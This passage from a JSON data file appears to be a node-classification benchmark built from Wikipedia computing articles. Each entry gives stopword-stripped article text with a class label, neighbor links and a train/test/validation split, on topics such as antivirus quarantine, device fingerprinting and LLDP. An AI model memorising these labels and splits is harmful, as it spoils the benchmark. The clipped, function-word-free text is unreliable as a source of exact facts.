set-of-subsets measured reed law complete graph measured metcalfe law",
    "neighbors": [
      78
    ],
    "mask": "None"
  },
  {
    "node_id": 11299,
    "label": 4,
    "text": "Quarantine_(computing):quarantine computing quarantine function antivirus software automatically isolates infected files computer hard disk files put quarantine longer capable infecting hosting system december 1988 shortly morris worm work started quarantine anti-malware file reliability product released april 1989 quarantine first product use file signature instead viral signature methods original quarantine used hunt b-tree database files crc16 crc-ccitt signatures doubling signatures rendered useless least immoderately difficult attacks based crc invariant modifications release 2 april 1990 used crc-32 signature one based crc-32 bits word shuffled subsequent ms-av microsoft designed check point apparently relied eight bit checksum—at least thousand files hundreds identical signatures quarantine 1990 version also allowed quarantine allowed system managers track modifications selected files file structures hence quarantine users also got early warnings failing disks disk interface cards 1990 quarantine received lan magazine best year security award year quarantine reportedly responsible finding first stealth virus university toronto pattern matching virus detectors failed efforts expenses convert quarantine platforms went unrewarded tripwire 1991 copy quarantine *nix better funded publicized ondisk could afford match later efforts include modularized reliability intrusion approaches include either sha-1 md5 signatures like quarantine stopped shipping 1994",
    "neighbors": [
      2213,
      4403,
      7515,
      8668,
      6430
    ],
    "mask": "None"
  },
  {
    "node_id": 11300,
    "label": 2,
    "text": "Graphics_device_interface:graphics device interface graphics device interface subsystem operating systems use representing graphical objects transmitting output devices monitors printers cases graphics device interface able draw 2d graphics simple 3d graphics order make use advanced graphics keep performance api directx opengl needs installed microsoft windows gdi functionality resides gdi.exe 16-bit windows gdi32.dll 32-bit windows",
    "neighbors": [
      6114,
      4836,
      6797,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 11301,
    "label": 3,
    "text": "Windows_Fundamentals_for_Legacy_PCs:windows fundamentals legacy pcs windows fundamentals legacy pcs winflp thin client operating system microsoft based windows xp embedded optimized older less powerful hardware released july 8 2006 marketed full-fledged general purpose operating system although functionally able perform tasks generally associated one includes certain functionality local workloads security management document viewing related tasks .net framework designed work client–server solution rdp clients third party clients citrix ica windows fundamentals legacy pcs originally announced code name eiger 12 may 2005 mönch announced potential follow-up project time name windows fundamentals legacy pcs appeared press release september 2005 introduced formerly code-named “ eiger ” described exclusive benefit sa nowiki /nowiki microsoft software assurance nowiki /nowiki customers gartner evaluation april 2006 stated rtm version windows fundamentals legacy pcs released july 8 2006 release announced press july 12 2006 may 2011 microsoft announced windows thin pc successor product microsoft positions windows fundamentals legacy pcs operating system provides basic computing services older hardware still providing core management features recent windows releases windows firewall group policy automatic updates management services however considered general-purpose operating system microsoft windows fundamentals legacy pcs windows xp embedded derivative optimized legacy pcs requires significantly fewer system resources fully featured windows xp also features basic networking extended peripheral support directx ability launch remote desktop clients compact discs addition local applications offers support hosted remote server using remote desktop installed local hard drive configured run diskless workstation despite optimized older pcs hardware requirements windows fundamentals legacy pcs similar windows xp although faster running slower clock speeds windows xp windows fundamentals legacy pcs smaller feature set windows xp example winflp include paint outlook express windows games solitaire another limitation absence compatibility tab properties ... dialog box executable files internet explorer 8 7 installed hotfix required auto-complete work newer versions browser windows fundamentals legacy pcs exclusively available microsoft software assurance customers designed inexpensive upgrade option corporations number windows 9x computers lack hardware necessary support latest windows available retail oem channels october 7 2008 service pack 3 windows embedded point service windows fundamentals legacy pcs made available april 18 2013 service pack 3 windows fundamentals legacy pcs made available download previously removed microsoft site microsoft marketing pages windows fundamentals redirect windows thin pc suggesting windows fundamentals longer available customers windows fundamentals legacy pcs lifecycle policy windows xp support lifespan ended 8 april 2014",
    "neighbors": [
      8576,
      641,
      2179,
      5380,
      3463,
      651,
      6797,
      639,
      8080,
      3857,
      7057,
      8976,
      2196,
      9874,
      10896,
      11283,
      4505,
      4515,
      3496,
      6441,
      6697,
      1581,
      10926,
      7983,
      3250,
      3890,
      9910,
      10747,
      6462,
      7615,
      321,
      7106,
      582,
      1098,
      10957,
      3283,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      5600,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      8315,
      9448,
      10989,
      5103,
      5363,
      7796,
      6265,
      5371,
      636,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 11302,
    "label": 4,
    "text": "Richard_Ledgett:richard ledgett richard h. ledgett jr. former deputy director national security agency ledgett undergraduate degree psychology graduate degree strategic intelligence 1988 began working national security agency served variety positions cybersecurity division previous positions nsa included deputy director analysis production 2009–2010 deputy director data acquisition 2006–2009 assistant deputy director data acquisition 2005–2006 chief nsa/css pacific 2002–2005 2012 2013 director nsa/css threat operations center responsible round-the-clock cryptologic activities discover counter adversary cyber efforts june 2013 appointment deputy director january 2014 ledgett headed investigation leaks regarding nsa surveillance programs made edward snowden february 3 2017 ledgett announced would retiring spring successor george c. barnes august 15 2017 ledgett elected bank corporation board directors ledgett pledged increased transparency regarding nsa operations however defended operations nsa argued rare interview reuters nsa operations completely legal ledgett also accused media sensationalizing reports various nsa mass surveillance programs march 2014 ledgett stated ted talk nsa operates legally argued president james madison would proud way constitutional checks balances governed nsa mass surveillance",
    "neighbors": [
      266,
      6668,
      9357,
      2712,
      289,
      4898,
      3495,
      1714,
      10305,
      327,
      6344,
      7887,
      10832,
      2897,
      4566,
      6749,
      7137,
      365,
      4719
    ],
    "mask": "Test"
  },
  {
    "node_id": 11303,
    "label": 5,
    "text": "Etch_(protocol):etch protocol etch open-source cross-platform framework building network services first announced may 2008 cisco systems etch encompasses service description language compiler number language bindings intended supplement soap corba methods communicating networked pieces software especially emphasis portability transport independence small size high performance etch designed incorporated existing applications systems enabling transition service-oriented architecture derived work cisco unified application environment product acquired cisco part metreos acquisition mid-2008 release planned supported java c second wave support supposed include ruby python javascript c. july 2008 etch released apache 2.0 license part open source process etch submitted apache incubator accepted new podling august 25 2008 formal vote proposed eventually passed september 2008 etch entered start-up phase within apache incubator cisco announced unified application environment end life february 8 2012 january 2013 etch become apache top-level project etch marked retired project december 2016 replacement project announced specified",
    "neighbors": [
      3462,
      10377,
      4107,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      9245,
      3877,
      10661,
      11355,
      5677,
      1327,
      6834,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      6875,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      9441,
      10465,
      11235,
      8294,
      11111,
      8425,
      8554,
      747,
      5612,
      8810,
      2163,
      6774,
      7159,
      10486,
      1913,
      1018,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11304,
    "label": 2,
    "text": ".asec:.asec .asec file extension android secure encrypted asec file file extension specifically associated google android operating system first introduced android 2.2 code name froyo may 2010 like file extensions group characters end period represents actual format organization file purpose asec format prevent existing applications modified corrupted programs applications moved sd card use asec extension files found .android_secure folder sd card application must moved memory back device ’ local storage file decrypted asec file format basic apk android package file format",
    "neighbors": [
      5522
    ],
    "mask": "Train"
  },
  {
    "node_id": 11305,
    "label": 2,
    "text": "AntiX:antix antix linux distribution built directly debian stable comparatively lightweight suitable older computers also providing cutting edge kernel applications well updates additions via apt-get package system debian-compatible repositories besides standard live release versions antix available base core allowing installations even lower amounts ram hard drive space overall hardware limitations antix available ia-32 x86-64 architectures comes 3 versions three versions joined antix mx 2014 developed cooperation mepis community uses xfce default desktop environment based directly debian stable highly stable gives solid performance medium-sized footprint november 2016 mx linux listed separate distro distrowatch antix linux distribution originally based mepis based debian stable distribution initially replaced mepis kde desktop environment fluxbox icewm window managers making suitable older less powerful x86-based systems unlike debian antix systemd-free",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      5380,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      7152,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 11306,
    "label": 7,
    "text": "Euphoria_(software):euphoria software euphoria game animation engine created naturalmotion based dynamic motion synthesis naturalmotion proprietary technology animating 3d characters on-the-fly based full simulation 3d character including body muscles motor nervous system instead using predefined animations characters actions reactions synthesized real-time different every time even replaying scene common current video games use limp ragdolls animations generated fly euphoria employs complex method animate entirety physically bound objects within game environment engine used indiana jones game since cancelled according web site euphoria runs microsoft windows os x linux playstation 3 playstation 4 xbox 360 xbox one ios android platforms compatible commercial physics engines press release enclosed second trailer eventually confirmed grand theft auto iv first rockstar games feature euphoria red dead redemption second game use engine star wars titles force unleashed ii use euphoria games based rockstar advanced game engine rage including grand theft auto v euphoria integrated source code rage",
    "neighbors": [
      8454,
      8937,
      2826,
      3210,
      6797,
      7983,
      6900,
      2293,
      4182,
      823,
      9691,
      8185,
      5914,
      5083,
      1916,
      11700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11307,
    "label": 8,
    "text": "Template_Attribute_Language:template attribute language template attribute language tal templating language used generate dynamic html xml pages main goal simplify collaboration programmers designers achieved embedding tal statements inside valid html xml tags worked using common design tools tal created zope used python-based projects well following attributes used normally prefixed codice_1 tag one tal attributes evaluated fairly logical order cases tag present lends take attributes special tal tags used making codice_1 prefix optional e.g would cause code inside codice_5 tags used whenever context whatever application server defines context e.g object contains variable codice_6 true value e.g list containing least one element identifier following colon arbitrary simply needs opening closing tag macro expansion template attribute language metal complements tal providing macros allow reuse code across template files created zope used python projects well metal complements tal ability reuse code allows developer define use macros turn may slots using macro variational content specified slot generating xml documents xml namespace must specified codice_7 following attributes recognised normally requiring „ codice_8 “ prefix normally one used time cases tag present lends take attributes special cases one metal attribute needed special metal tags used making „ metal “ prefix optional e. g. sketched roundup mind tal/tales/metal used following projects besides original zope implementation exhaustive",
    "neighbors": [
      8582,
      1258,
      8554,
      5677,
      2062,
      595,
      502,
      11610,
      2556,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11308,
    "label": 0,
    "text": "Walter_Daelemans:walter daelemans walter daelemans born june 3 1960 professor computational linguistics university antwerp also research director computational linguistics psycholinguistics research center clips daelemans pioneered use machine learning techniques especially memory-based learning natural language processing europe early 1990s together antal van den bosch wrote book memory-based language processing developed software package timbl time professor tilburg university founded research group induction linguistic knowledge ilk 2003 elected fellow eccai european coordinating committee artificial intelligence “ pioneering work field artificial intelligence outstanding service european artificial intelligence community ” 2014 named fellow association computational linguistics",
    "neighbors": [
      7780,
      1890,
      7724
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11309,
    "label": 4,
    "text": "MyDLP:mydlp mydlp data loss prevention solution originally available released free open source software supported data inspection channels include web mail instant messaging file transfer removable storage devices printers mydlp development project originally made source code available terms gnu general public license mydlp one first free software projects data loss prevention acquired comodo group may 2014 comodo since begun marketing enterprise version comodo security solutions subsidiary free version removed website open source code updated since early 2014 october 2010 mydlp included following subprojects mydlp network mostly written erlang performance concurrent network operations python also used exceptional cases subsystem could run platform supported erlang python mydlp endpoint developed windows platforms written c++ c mydlp web ui written php adobe flex used mysql order store user configurations october 2010 mydlp included widespread data loss prevention features text extraction binary formats incident management queue source code detection data identification methods bank account credit card several national identification numbers besides features like data classification statistical analysis trained sentences native language processor integrated naive bayes classifier claimed included",
    "neighbors": [
      8644,
      8615,
      8554,
      5677,
      7022
    ],
    "mask": "Test"
  },
  {
    "node_id": 11310,
    "label": 9,
    "text": "Docstring:docstring programming docstring string literal specified source code used like comment document specific segment code unlike conventional source code comments even specifically formatted comments like javadoc documentation docstrings stripped source tree parsed retained throughout runtime program allows programmer inspect comments run time instance interactive help system metadata appears first introduced original teco implementation emacs languages support docstrings include python lisp elixir clojure gherkin julia documentation supported language level form docstrings markdown elixir de facto markup language choice use docstrings lisp docstrings known documentation strings common lisp standard states particular implementation may choose discard docstrings whenever want whatever reason kept docstrings may viewed changed using documentation function instance common practice documenting code object head definition captured addition docstring syntax python language docstring python code object module class function first statement code object immediately following definition 'def 'class statement statement must bare string literal kind expression docstring code object available code object codice_1 attribute codice_2 function following python file shows declaration docstrings within python source file assuming code saved mymodule.py following interactive session showing docstrings may accessed",
    "neighbors": [
      963,
      6502,
      5031,
      8554,
      2062,
      6718
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11311,
    "label": 3,
    "text": "Lazy_Jones:lazy jones lazy jones computer game commodore 64 zx spectrum msx tatung einstein written david whittaker released terminal software 1984 spectrum version ported simon cobb lazy jones essentially collection fifteen smaller sub-games game takes place inside hotel three floors connected elevator character lazy hotel employee much care work prefers sneak rooms play video games instead main screen lazy jones hotel interior character use elevator travel freely three floors must watch enemies current hotel manager top floor ghost previous manager bottom floor haunted cleaning cart middle floor enemies walk around pursue character contact fatal floor six rooms three side elevator room entered inside rooms video game character immediately begins playing well video games hotel bar bed cleaning closet toilet bar works like video game bed cleaning closet toilet useless decorations intentionally added whittaker run ideas new games rooms visited game starts increasingly faster time one tracks lazy jones soundtrack wall sampled german electro project zombie nation 1999 hit single kernkraft 400 plot game simple- hotel care taker named jones bored decides go rooms play games various sub-games generally simplified versions famous 1970s 1980s video games space invaders frogger snake h.e.r.o breakout chuckie egg plots gameplay simple player simply must avoid incoming enemies long enough score many points player must shoot enemies score points whittaker developed sub-game individually basic first make sure worked converted one almost line line assembly code sub-game time limit sub-games possible die thus ending sub-game prematurely others end time limit expires fourteen video games follows hotel bar character stands front rather wide bar barman patron hopelessly drunk moving back forth across bar different speeds pressing fire button standing front drink barman time earns points drunk patron bars movement jumped sub-games possible die prematurely eggie chuck jay walk res q wall sub-games end time limit runs 99 red balloons laser jones outland scoot star dust hills alive reflex turk wild wafers wipeout hotel bar game chiptune music characteristic sound distinct many c64 games 21 subtunes using two voices sid chip turn use sawtooth sound one voice plays simple octave bassline part one adding melody tunes share tempo well change seamlessly playing another sub game subtune 21 named star dust used german producer team zombie nation song kernkraft 400 without permission florian senfter splank later paid undisclosed sum david whittaker use melody tune title 99 red balloons comes english name song 99 luftballons german songstress nena version reached 1 uk singles chart visage fade grey also heard",
    "neighbors": [
      3075,
      4109,
      9006,
      7536,
      10576,
      10931,
      9716
    ],
    "mask": "Test"
  },
  {
    "node_id": 11312,
    "label": 1,
    "text": "Bahamas_Maritime_Authority:bahamas maritime authority bahamas maritime authority bma authority registers vessels bahamas enforces safety standards bahamian-registered craft authority office shirlaw house nassau also offices bahamas house new york city hutchinson house hong kong london agency established july 1995 prior establishment authority bahamas ministry transport maintained register ships bahamian-flagged bma formed due growth made prior arrangement difficult",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11313,
    "label": 4,
    "text": "CWShredder:cwshredder cwshredder program runs microsoft windows removing coolwebsearch family spyware originally created merijn bellekom bought intermute october 19 2004 june 2005 intermute acquired trend micro program distributed trend micro currently offered two forms program updated since ownership transferred trend micro currently available version v2.19 released november 2005 still functional unclear trend micro plans update program controversy quarters whether trend micro either declare cwshredder open source compelled give ownership another party program maintained updated",
    "neighbors": [
      9600,
      6797,
      5935,
      10392,
      7515,
      3739,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11314,
    "label": 3,
    "text": "MPC5xx:mpc5xx mpc5xx family processors mpc555 mpc565 32-bit powerpc embedded microprocessors operate 40 66 mhz frequently used automotive applications including engine transmission controllers delphi corporation use either mpc561 mpc565 engine controllers supply general motors nearly 2009 model gm north america vehicles using mpc5xx engine controller bosch also used mpc5xx throughout edc-16 series diesel engine controllers cummins b series diesel engine ecu generally considered microcontrollers integrated peripheral set unusual architecture mmu large on-chip sram large much 1 mb low latency access on-chip flash memories means architecture tailored control applications instead block-address translation hardware-driven fixed-page address translation prescribed first powerpc specification 5xx cores provided software-driven translation mechanism supported variable page sizes model basis embedded mmu model current power isa specification mpc5xx – powerpc 5xx family processors share common naming scheme development powerpc 5xx family discontinued favour flexible powerful powerpc 55xx family peripherals model vary frequently include analog-to-digital converters adc time processor units tpu gpio uarts/serial qsmcm mpc5xx family descends mpc8xx powerquicc family core means uses harvard architecture single issue core unlike 8xx family 5xx variants floating point unit earlier chips like mpc509 instruction cache recent chips capability contain large amounts flash memory on-board capable bursting instructions processor low-cost chips omit flash memory adds lot die area driving price chip many controller applications run long control loops large dataset low latency deterministic access data instruction routines important data stored on-chip sram available datapath processor single cycle performance quite good data must accessed off-chip frequently performance reduced chip burst data accesses external ram slow bus access protocol simple memory interface programmed setting default memory location writing base registers chips quite popular hobbyists well automotive industrial developers",
    "neighbors": [
      7170,
      7299,
      3844,
      4868,
      1158,
      7302,
      10501,
      7305,
      11395,
      3467,
      1548,
      6925,
      6415,
      10767,
      1170,
      7445,
      2073,
      7065,
      9371,
      4773,
      8102,
      9638,
      682,
      11054,
      2224,
      5297,
      1461,
      11447,
      8761,
      6715,
      2623,
      1983,
      10945,
      7234,
      7235,
      9928,
      3017,
      9163,
      6607,
      336,
      10833,
      8530,
      3540,
      2517,
      9044,
      9685,
      4569,
      3932,
      3936,
      8931,
      7269,
      10985,
      3050,
      9964,
      11374,
      8048,
      3185,
      7281,
      5235,
      10224,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11315,
    "label": 9,
    "text": "BASIC_A+:basic a+ basic a+ developed optimized systems software cupertino california united states provide atari 8-bit family extended basic compatible faster simpler rom-based atari basic atari basic came 8 kb rom cartridge basic a+ delivered floppy disk took 15 kb computer ram leaving 23 kb available user programs 48 kb atari 800 basic a+ offered price us 80.00 1983 including products os/a+ easmd editor/assembler extension atari basic came supplement latter reference manual documentation addition faster rom-bound counterpart basic a+ provided number extra commands dos operations player/missile graphics debugging",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      712,
      847,
      1879,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 11316,
    "label": 2,
    "text": "DirectX_plugin:directx plugin computer music professional audio creation directx plugin software processing component loaded plugin host applications allow real-time processing audio effects mixing audio act virtual synthesizers directx plugins allow replacement traditional recording studio hardware rack units used professional studios software-based counterparts connected together modular way allows host manufacturers focus conviviality efficiency products specialized manufacturers focus digital signal processing aspect example plugins effects boxes reverbs delays effects pedals like guitar distortion flange chorus mixing mastering processors compressors limiters exciters sub bass enhancers stereo imagers many similar virtual studio technology later audio units apple mac os x directx plugins open standard architecture connecting audio synthesizers effect plugins audio editors hard-disk recording systems directx plug-ins based microsoft component object model com allows plugins recognised used applications via common interfaces plugins connect applications plugins pins via pass processes buffered streams audio video data architecturally directx plugins directshow filters directx plugins also two types directx effect plugins dx directx instrument plugins dxi effect plugins used generate process receive otherwise manipulate streams audio instrument plugins midi controllable directx plugins generally used synthesize sound playback sampled audio using virtual synthesizers samplers drum machines directx effect plugins developed microsoft part directshow directx instruments developed cakewalk co-operation microsoft available windows several wrapper plugins available directx plugins used applications support vst vice versa others chainer plugins also available allow chaining multiple plugins together directx plugins developed c++ using microsoft directx sdk sony audio plug-in development kit cakewalk directx wizard also delphi sdk available directx plugins superseded dmo-based signal processing filters recently media foundation transforms",
    "neighbors": [
      5761,
      10243,
      9348,
      5765,
      10886,
      2183,
      9609,
      5259,
      653,
      6927,
      9234,
      1043,
      3224,
      5401,
      5913,
      5119,
      11546,
      10654,
      1055,
      4384,
      8607,
      2083,
      4771,
      8227,
      2854,
      7846,
      10024,
      1577,
      10026,
      10282,
      10029,
      10414,
      4143,
      9263,
      11570,
      8246,
      6584,
      2493,
      5952,
      1348,
      844,
      7629,
      4178,
      596,
      9813,
      214,
      9434,
      603,
      10079,
      736,
      4321,
      6114,
      6370,
      4836,
      8161,
      11616,
      1770,
      11498,
      9196,
      3821,
      4590,
      10991,
      11247,
      3573,
      10229,
      1656,
      5754,
      9340,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 11317,
    "label": 9,
    "text": "David_F._Bacon:david f. bacon david bacon american computer programmer bacon began working programmer age 16 worked startup senior year high school columbia college columbia university worked first david e. shaw non-von supercomputer network algorithms simulation yechiam yemini creating nest network simulator served basis number network simulators including cornell real thence lbl ns simulator bacon spent career ibm thomas j. watson research center starting programmer 1985 working hermes distributed programming language eventually becoming principal research staff member took sabbatical 2009 visiting professor computer science harvard 2015 joined google working spanner distributed database system much work focused garbage collection 2009 inducted acm fellow contributions real-time systems object-oriented language design implementation work metronome hard real-time tracing garbage collector became basis ibm websphere real time java virtual machine used software navy ddg 1000 destroyer original research subsequently selected 2013 influential paper award symposium principles programming languages work garbage collecting cyclic structures reference counted systems used number scripting languages including php 2013 published first garbage collector implemented completely hardware selected acm research highlight addition garbage collection work focused implementation concurrent object-oriented languages thesis work rapid type analysis rta used many compilers analysis frameworks construct call graphs object-oriented languages including soot go 2004 work high-performance locking java appeared list 50 influential pldi papers time",
    "neighbors": [
      2304,
      7841,
      8644,
      5677,
      9490,
      1459,
      726,
      1435
    ],
    "mask": "Train"
  },
  {
    "node_id": 11318,
    "label": 0,
    "text": "Michael_Collins_(computational_linguist):michael collins computational linguist michael j. collins born 4 march 1970 researcher field computational linguistics research interests natural language processing well machine learning made important contributions statistical parsing statistical machine learning studies collins covers wide range topics parse re-ranking tree kernels semi-supervised learning machine translation exponentiated gradient algorithms general focus discriminative models structured prediction one notable contribution state-of-the-art parser penn wall street journal corpus november 11 2015 works cited 16,020 times h-index 47 collins worked researcher labs january 1999 november 2002 later held positions assistant associate professor m.i.t since january 2011 professor columbia university 2011 named fellow association computational linguistics",
    "neighbors": [
      1890,
      7780,
      7724,
      7164,
      4350
    ],
    "mask": "Test"
  },
  {
    "node_id": 11319,
    "label": 4,
    "text": "Device_fingerprint:device fingerprint device fingerprint machine fingerprint browser fingerprint information collected remote computing device purpose identification fingerprints used fully partially identify individual users devices even persistent cookies also zombie cookies ca n't read stored browser client ip address hidden even one switches another browser device may allow remote application detect prevent online identity theft credit card fraud also compile long-term records individuals browsing histories even 're attempting avoid tracking raising major concern internet privacy advocates computer security experts consider ease bulk parameter extraction offered web browsers security hole basic web browser configuration information long collected web analytics services effort accurately measure real human web traffic discount various forms click fraud assistance client-side scripting languages collection much esoteric parameters possible assimilation information single string comprises device fingerprint 2010 electronic frontier foundation launched website visitors test browser fingerprint collecting sample 470161 fingerprints measured least 18.1 bits entropy possible browser fingerprinting advancements canvas fingerprinting claims add another 5.7 bits firefox provides feature protect browser fingerprinting since 2015 version 41 july 2018 still experimental disabled default wwdc 2018 apple announced safari macos mojave presents simplified system information users browse web preventing tracked based system configuration motivation device fingerprint concept stems forensic value human fingerprints ideal case web client machines would different fingerprint value diversity value would never change stability assumptions would possible uniquely distinguish machines network without explicit consent users practice neither diversity stability fully attainable improving one tendency adversely impact fingerprinting methods range passive active passive fingerprinting refers techniques involve obvious querying client machine methods rely upon precise classification factors client tcp/ip configuration os fingerprint ieee 802.11 wireless settings hardware clock skew active fingerprinting assumes client tolerate degree invasive querying active method installation executable code directly client machine code may access attributes typically available means mac address unique serial numbers assigned machine hardware data useful fingerprinting programs employ digital rights management passive collection device attributes web-browser layer may occur several osi model layers normal operation various network protocols transmit broadcast packets headers one may infer client configuration parameters sorted layer examples protocols collection device fingerprints web clients browser software relies availability javascript similar client-side scripting language harvesting suitably large number parameters two classes users limited clientside scripting mobile devices running privacy software browser extensions block ads trackers separate issue single device may multiple web clients installed even multiple virtual operating systems distinct client operating system distinct internal parameters one may change device fingerprint simply running different browser machine unless new crossbrowser fingerprinting technique used furthermore sandboxed devices like iphone exhibit little uniqueness fingerprinting techniques involving technical information device browser font list sufficient create unique fingerprint",
    "neighbors": [
      9732,
      3462,
      8329,
      5402,
      7965,
      5536,
      10924,
      9901,
      7983,
      6576,
      9395,
      8630,
      9146,
      3643,
      3133,
      7364,
      4435,
      5078,
      5469,
      5470,
      3555,
      3688,
      11112,
      3434,
      7411,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11320,
    "label": 4,
    "text": "BeyondTrust:beyondtrust beyondtrust formerly symark american company develops markets supports family privileged identity management pam privileged remote access vulnerability management products unix linux windows mac os operating systems beyondtrust founded 2006 provided least privilege management software microsoft windows os unix vendor symark acquired beyondtrust 2009 2018 company acquired bomgar developer remote support pam software cases beyondtrust adopted new company name symark founded 1985 vax/vms utility software company los angeles san fernando valley name derived initials founders bob sommers doug yarrow symark also client-server computing vendor later acquiring license unix security product upm owned quest software rebranding version powerbroker symark relocated westlake village california agoura hills company focused identity access password management privileged users unix systems 2003—2008 company expanded spain portugal japan latin america time period also grew almost 300 percent one fastest growing private companies l.a. area 2003 autoprof introduced autoprof policy maker first commercial product build upon microsoft built-in group policy objects make common tasks like mapping network drives sharing printer connections easier 2005 autoprof grew 90 revenue previous year changed company name desktopstandard four million desktops management desktopstandard software across 3,500 customers 2003—2005 desktopstandard added six products portfolio rbac password management identity access management windows 2006 microsoft acquired desktopstandard products desktopstandard ceo formed new company beyondtrust around remaining policy maker application security product 2009 symark acquired windows-based business beyondtrust 2009 approximately 20 million adopted beyondtrust new company name 2011 beyondtrust acquired software likewise software acquisition expanded portfolio inside perimeter security capabilities windows unix-based systems include authentication auditing management cross-platform cloud environments may 2012 beyondtrust acquired vulnerability management pioneer eeye digital security december 2012 beyondtrust acquired blackbird group september 2014 veritas capital acquires beyondtrust 310 million october 2018 bomgar acquires beyondtrust veritas",
    "neighbors": [
      704,
      929,
      9862,
      4873,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11321,
    "label": 5,
    "text": "Link_Layer_Discovery_Protocol:link layer discovery protocol link layer discovery protocol lldp vendor-neutral link layer protocol used network devices advertising identity capabilities neighbors local area network based ieee 802 technology principally wired ethernet protocol formally referred ieee station media access control connectivity discovery specified ieee 802.1ab ieee 802.3 section 6 clause 79 lldp performs functions similar several proprietary protocols cisco discovery protocol foundry discovery protocol nortel discovery protocol link layer topology discovery information gathered lldp stored device management information database mib queried simple network management protocol snmp specified rfc 2922 topology lldp-enabled network discovered crawling hosts querying database information may retrieved include link layer discovery protocol may used component network management network monitoring applications one example use data center bridging requirements dcbx discovery capability exchange protocol used conveying capabilities configuration features neighbors ensure consistent configuration across network lldp used advertise power ethernet capabilities requirements negotiate power delivery lldp information sent devices interfaces fixed interval form ethernet frame frame contains one lldp data unit lldpdu lldpdu sequence type-length-value tlv structures ethernet frame used lldp typically destination mac address set special multicast address 802.1d-compliant bridges forward multicast unicast destination addresses permitted ethertype field set 0x88cc lldp frame starts following mandatory tlvs chassis id port id time-to-live mandatory tlvs followed number optional tlvs frame ends special tlv named end lldpdu type length fields 0 accordingly ethernet frame containing lldpdu following structure tlv components following basic structure custom tlvs supported via tlv type 127 value custom tlv starts 24-bit organizationally unique identifier 1 byte organizationally specific subtype followed data basic format organizationally specific tlv shown according ieee std 802.1ab §9.6.1.3 organizationally unique identifier shall contain organization oui defined ieee std 802-2001 organization responsible managing subtypes media endpoint discovery enhancement lldp known lldp-med provides following facilities lldp-med protocol extension formally approved published standard ansi/tia-1057 telecommunications industry association tia april 2006",
    "neighbors": [
      10242,
      8708,
      7045,
      3847,
      649,
      7049,
      9868,
      6670,
      3218,
      9365,
      5270,
      10005,
      11413,
      5402,
      5531,
      8989,
      3742,
      10271,
      8097,
      9380,
      2085,
      9381,
      3751,
      3752,
      5671,
      6187,
      172,
      4396,
      10924,
      816,
      434,
      562,
      2996,
      3762,
      5045,
      9909,
      7865,
      5434,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      5439,
      8386,
      3780,
      7364,
      2887,
      8265,
      842,
      11210,
      2509,
      4687,
      9937,
      5843,
      2904,
      10332,
      5469,
      5470,
      5471,
      5472,
      4581,
      10341,
      5863,
      10344,
      11112,
      367,
      8432,
      7411,
      11125,
      6904,
      6651,
      8828,
      3838
    ],
    "mask": "None"
  },
  {
    "node_id": 11322,
    "label": 2,
